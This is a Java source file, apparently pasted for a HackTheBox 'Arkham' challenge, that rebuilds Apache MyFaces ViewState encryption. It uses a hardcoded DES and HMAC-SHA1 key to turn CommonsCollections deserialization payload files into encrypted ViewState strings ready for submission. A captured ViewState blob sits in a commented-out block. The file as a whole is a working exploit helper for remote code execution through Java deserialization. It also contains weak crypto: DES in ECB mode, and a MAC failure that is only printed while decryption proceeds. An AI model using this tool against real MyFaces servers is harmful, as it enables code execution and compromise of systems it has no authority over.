b6ZnYvG7

· 6 years ago · May 27, 2019, 01:36 AM
1/*
2 * To change this license header, choose License Headers in Project Properties.
3 * To change this template file, choose Tools | Templates
4 * and open the template in the editor.
5 */
6package myfaces_stateutils;
7
8import static com.oracle.jrockit.jfr.ContentType.Bytes;
9import java.io.ByteArrayInputStream;
10import java.io.ByteArrayOutputStream;
11import java.io.IOException;
12import java.io.ObjectInputStream;
13import java.io.ObjectOutputStream;
14import java.io.UnsupportedEncodingException;
15import java.security.AccessController;
16import java.security.NoSuchAlgorithmException;
17import java.security.PrivilegedActionException;
18import java.security.PrivilegedExceptionAction;
19import java.util.Base64;
20import java.util.Random;
21import java.util.logging.Level;
22import java.util.logging.Logger;
23import java.util.zip.GZIPInputStream;
24import java.util.zip.GZIPOutputStream;
25
26import javax.crypto.Cipher;
27import javax.crypto.KeyGenerator;
28import javax.crypto.Mac;
29import javax.crypto.SecretKey;
30import javax.crypto.spec.IvParameterSpec;
31import javax.crypto.spec.SecretKeySpec;
32
33import java.io.File;
34import java.nio.file.Files;
35import java.nio.file.Paths;
36
37import java.security.MessageDigest;
38import java.security.NoSuchAlgorithmException;
39import java.util.ArrayList;
40import java.util.Formatter;
41import java.util.List;
42
43public class Myfaces_StateUtils {
44
45    public static final String ZIP_CHARSET = "ISO-8859-1";
46
47    public static final String DEFAULT_ALGORITHM = "DES";
48
49    public static final String DEFAULT_ALGORITHM_PARAMS = "ECB/PKCS5Padding";
50
51    public static final String INIT_PREFIX = "org.apache.myfaces.";
52
53    public static final String USE_ENCRYPTION = INIT_PREFIX + "USE_ENCRYPTION";
54
55    public static final String INIT_SECRET = INIT_PREFIX + "SECRET";
56
57    public static final String INIT_ALGORITHM = INIT_PREFIX + "ALGORITHM";
58
59    public static final String INIT_SECRET_KEY_CACHE = INIT_SECRET + ".CACHE";
60
61    public static final String INIT_ALGORITHM_IV = INIT_ALGORITHM + ".IV";
62
63    public static final String INIT_ALGORITHM_PARAM = INIT_ALGORITHM + ".PARAMETERS";
64
65    public static final String SERIAL_FACTORY = INIT_PREFIX + "SERIAL_FACTORY";
66
67    public static final String COMPRESS_STATE_IN_CLIENT = INIT_PREFIX + "COMPRESS_STATE_IN_CLIENT";
68
69    public static final String DEFAULT_MAC_ALGORITHM = "HmacSHA1";
70
71    public static final String INIT_MAC_ALGORITHM = "org.apache.myfaces.MAC_ALGORITHM";
72
73    public static final String INIT_MAC_SECRET = "org.apache.myfaces.MAC_SECRET";
74
75    public static final byte[] decode(byte[] bytes) {
76        return Base64.getDecoder().decode(bytes);
77    }
78
79    private static SecretKey getSecret() {
80        Object secretKey;
81
82        String algorithm = "DES";
83
84        secretKey = new SecretKeySpec(findSecret("SnNGOTg3Ni0="), algorithm);
85
86        return (SecretKey) secretKey;
87    }
88
89    private static byte[] findSecret(String secret) {
90        byte[] bytes = null;
91
92        bytes = decode(secret.getBytes());
93
94        return bytes;
95    }
96
97    private static byte[] findMacSecret(String secret) {
98        byte[] bytes = null;
99
100        bytes = decode(secret.getBytes());
101
102        return bytes;
103    }
104
105    private static SecretKey getMacSecret() {
106        Object secretKey;
107
108        String macAlgorithm = "HmacSHA1";
109
110        secretKey = new SecretKeySpec(findMacSecret("SnNGOTg3Ni0="), macAlgorithm);
111
112        return (SecretKey) secretKey;
113    }
114
115    private static String bytesToHex(byte[] hashInBytes) {
116
117        StringBuilder sb = new StringBuilder();
118        for (byte b : hashInBytes) {
119            sb.append(String.format("%02x", b));
120        }
121        return sb.toString();
122
123    }
124    
125    byte[] byte_concat(byte[]...arrays)
126{
127    // Determine the length of the result array
128    int totalLength = 0;
129    for (int i = 0; i < arrays.length; i++)
130    {
131        totalLength += arrays[i].length;
132    }
133
134    // create the result array
135    byte[] result = new byte[totalLength];
136
137    // copy the source arrays into the result array
138    int currentIndex = 0;
139    for (int i = 0; i < arrays.length; i++)
140    {
141        System.arraycopy(arrays[i], 0, result, currentIndex, arrays[i].length);
142        currentIndex += arrays[i].length;
143    }
144
145    return result;
146}
147
148    private static byte[] convert_arraylist_to_byte_array (List<Byte> byte_arraylist) {
149        int n = byte_arraylist.size();
150        byte[] out = new byte[n];
151        for (int i = 0; i < n; i++) {
152          out[i] = byte_arraylist.get(i);
153        }
154        
155        return out;
156    }
157    
158    public static byte[] decrypt(byte[] secure) {
159        String algorithm = "DES";
160
161        SecretKey secretKey = (SecretKey) getSecret();
162
163        String algorithmParams = "ECB/PKCS5Padding";
164        byte[] iv;
165
166        String macAlgorithm = "HmacSHA1";
167
168        SecretKey macSecretKey = (SecretKey) getMacSecret();
169
170        try {
171            // keep local to avoid threading issue
172            Mac mac = Mac.getInstance(macAlgorithm);
173            mac.init(macSecretKey);
174            Cipher cipher = Cipher.getInstance(algorithm + '/'
175                    + algorithmParams);
176
177            cipher.init(Cipher.DECRYPT_MODE, secretKey);
178
179            //EtM Composition Approach
180            int macLenght = mac.getMacLength();
181            mac.update(secure, 0, secure.length - macLenght);
182            byte[] signedDigestHash = mac.doFinal();
183
184            //System.out.println(bytesToHex(signedDigestHash));
185            boolean isMacEqual = true;
186            for (int i = 0; i < signedDigestHash.length; i++) {
187                if (signedDigestHash[i] != secure[secure.length - macLenght + i]) {
188                    isMacEqual = false;
189                }
190            }
191
192            List<Byte> secure_hash = new ArrayList<Byte>();
193            
194            for (int i = 0; i < signedDigestHash.length; i++) {        
195                secure_hash.add(secure[secure.length - macLenght + i]);
196            }
197            
198            byte[] secure_hash_2 = convert_arraylist_to_byte_array(secure_hash);
199
200            System.out.println("-------------------");
201            System.out.println(bytesToHex(secure_hash_2));
202            System.out.println("-------------------");
203            System.out.println(bytesToHex(signedDigestHash));
204            System.out.println("-------------------");
205            if (!isMacEqual) {
206                System.out.print("MAC NOT EQUAL");
207            }
208
209            return cipher.doFinal(secure, 0, secure.length - macLenght);
210        } catch (Exception e) {
211            System.out.print("Faces Exception");
212        }
213
214        return null;
215    }
216
217    public static byte[] encrypt(byte[] insecure) {
218        String algorithm = "DES";
219
220        SecretKey secretKey = (SecretKey) getSecret();
221
222        String algorithmParams = "ECB/PKCS5Padding";
223        byte[] iv;
224
225        String macAlgorithm = "HmacSHA1";
226
227        SecretKey macSecretKey = (SecretKey) getMacSecret();
228
229        try {
230            // keep local to avoid threading issue
231            Mac mac = Mac.getInstance(macAlgorithm);
232            mac.init(macSecretKey);
233            Cipher cipher = Cipher.getInstance(algorithm + '/' + algorithmParams);
234
235            cipher.init(Cipher.ENCRYPT_MODE, secretKey);
236
237            //EtM Composition Approach
238            int macLenght = mac.getMacLength();
239            byte[] secure = new byte[cipher.getOutputSize(insecure.length) + macLenght];
240            int secureCount = cipher.doFinal(insecure, 0, insecure.length, secure);
241            mac.update(secure, 0, secureCount);
242            mac.doFinal(secure, secureCount);
243
244            return secure;
245        } catch (Exception e) {
246            System.out.print("Faces Exception");
247        }
248        return null;
249    }
250
251    public static final byte[] encode(byte[] bytes) {
252        return Base64.getEncoder().encode(bytes);
253    }
254
255    public static String SHA1sum(byte[] convertme) throws NoSuchAlgorithmException {
256        MessageDigest md = MessageDigest.getInstance("SHA-1");
257        return byteArray2Hex(md.digest(convertme));
258    }
259
260    private static String byteArray2Hex(final byte[] hash) {
261        Formatter formatter = new Formatter();
262        for (byte b : hash) {
263            formatter.format("%02x", b);
264        }
265        return formatter.toString();
266    }
267
268    private static void java_server_faces_encrypt(String payload_path) {
269
270        try {
271            byte[] payload_bytes = Files.readAllBytes(Paths.get(payload_path));
272            byte[] encrypted_payload_bytes = encrypt(payload_bytes);
273
274            byte[] base64_payload_bytes = encode(encrypted_payload_bytes);
275
276            String base64_payload_string = new String(base64_payload_bytes);
277
278            
279            System.out.println(payload_path);
280            System.out.println(base64_payload_string);
281            System.out.println("\n----------------------------\n");
282
283        } catch (Exception e) {
284
285            System.out.println("Read File Error.");
286
287        }
288    }
289
290    private static void java_server_faces_decrypt(String base64_viewstate) {
291
292        byte[] ciphertext_base64_viewstate = decode(base64_viewstate.getBytes());
293
294        byte[] decrypted_base64_viewstate = decrypt(ciphertext_base64_viewstate);
295
296        String string_decrypted_base64_viewstate = new String(decrypted_base64_viewstate);
297
298        //System.out.println(string_decrypted_base64_viewstate);
299    }
300
301    public static void main(String[] argv) {
302
303        String path1 = "D:\\Desktop\\Games\\ECGS\\Extra\\Online Puzzles\\HackTheBox\\Machines\\In_Progress\\Arkham\\Payloads\\Windows_CommonsCollections1_intruder.txt";
304        String path2 = "D:\\Desktop\\Games\\ECGS\\Extra\\Online Puzzles\\HackTheBox\\Machines\\In_Progress\\Arkham\\Payloads\\Windows_CommonsCollections2_intruder.txt";
305        String path3 = "D:\\Desktop\\Games\\ECGS\\Extra\\Online Puzzles\\HackTheBox\\Machines\\In_Progress\\Arkham\\Payloads\\Windows_CommonsCollections3_intruder.txt";
306        String path4 = "D:\\Desktop\\Games\\ECGS\\Extra\\Online Puzzles\\HackTheBox\\Machines\\In_Progress\\Arkham\\Payloads\\Windows_CommonsCollections4_intruder.txt";
307        String path5 = "D:\\Desktop\\Games\\ECGS\\Extra\\Online Puzzles\\HackTheBox\\Machines\\In_Progress\\Arkham\\Payloads\\Windows_CommonsCollections5_intruder.txt";
308        String path6 = "D:\\Desktop\\Games\\ECGS\\Extra\\Online Puzzles\\HackTheBox\\Machines\\In_Progress\\Arkham\\Payloads\\Windows_CommonsCollections6_intruder.txt";
309        String path7 = "D:\\Desktop\\Games\\ECGS\\Extra\\Online Puzzles\\HackTheBox\\Machines\\In_Progress\\Arkham\\Payloads\\Windows_CommonsCollections5_curl.txt";
310        /*
311        java_server_faces_encrypt(path1);
312
313        java_server_faces_encrypt(path2);
314
315        java_server_faces_encrypt(path3);
316
317        java_server_faces_encrypt(path4);
318
319        java_server_faces_encrypt(path5);
320
321        java_server_faces_encrypt(path6);
322
323        System.out.println();
324
325        java_server_faces_decrypt("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");
326        */    
327
328        java_server_faces_encrypt(path7);}
329
330}